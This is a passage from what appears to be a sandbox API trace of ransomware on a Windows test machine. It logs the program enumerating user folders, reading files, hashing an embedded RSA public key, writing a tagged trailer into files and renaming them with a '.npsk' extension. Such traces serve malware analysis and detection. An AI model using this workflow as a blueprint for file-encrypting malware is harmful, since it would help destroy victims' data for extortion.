KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.736] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.737] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.737] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.737] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.737] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.737] GetLastError () returned 0x0 [0216.738] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.738] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.738] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.738] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.738] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.738] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.739] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.739] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.739] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.739] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.739] CloseHandle (hObject=0x61c) returned 1 [0216.742] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\dDSNcwG BqFC.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\ddsncwg bqfc.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\dDSNcwG BqFC.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\ddsncwg bqfc.png.npsk")) returned 1 [0216.744] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d4ebb20, ftCreationTime.dwHighDateTime=0x1d5dbfc, ftLastAccessTime.dwLowDateTime=0x3bba3d20, ftLastAccessTime.dwHighDateTime=0x1d5d7f8, ftLastWriteTime.dwLowDateTime=0x3bba3d20, ftLastWriteTime.dwHighDateTime=0x1d5d7f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m8MPhSNWcQuWMqMN Jsf", cAlternateFileName="M8MPHS~1")) returned 1 [0216.744] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d4ebb20, ftCreationTime.dwHighDateTime=0x1d5dbfc, ftLastAccessTime.dwLowDateTime=0x3bba3d20, ftLastAccessTime.dwHighDateTime=0x1d5d7f8, ftLastWriteTime.dwLowDateTime=0x3bba3d20, ftLastWriteTime.dwHighDateTime=0x1d5d7f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m8MPhSNWcQuWMqMN Jsf", cAlternateFileName="M8MPHS~1")) returned 0 [0216.744] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.744] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.744] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.744] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0216.744] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0216.745] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0216.745] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.745] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.745] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.745] PathFindFileNameW (pszPath="") returned="" [0216.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.746] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.746] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0216.746] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0216.746] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0216.746] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.746] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.746] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.746] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0216.747] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0216.747] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0216.747] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.747] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.747] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.747] PathFindFileNameW (pszPath="") returned="" [0216.747] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.749] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.749] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0216.749] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0216.749] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0216.749] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0216.749] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0216.749] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0216.749] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0216.749] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.750] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.750] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.750] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0216.750] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0216.751] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0216.751] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.751] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.751] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.751] PathFindFileNameW (pszPath="") returned="" [0216.751] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.753] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.753] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0216.753] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0216.753] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.753] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.753] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="_private\\" [0216.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0216.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0216.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.753] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.753] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.753] PathFindFileNameW (pszPath="") returned="" [0216.754] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.787] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.787] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0216.787] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned=".ico" [0216.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.788] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=29926) returned 1 [0216.788] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.790] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x74c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.790] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.832] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.832] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x74e6, lpOverlapped=0x0) returned 1 [0216.833] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.833] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.833] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.833] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0216.834] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.834] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.834] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.834] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.835] GetLastError () returned 0x0 [0216.835] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.835] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0216.835] 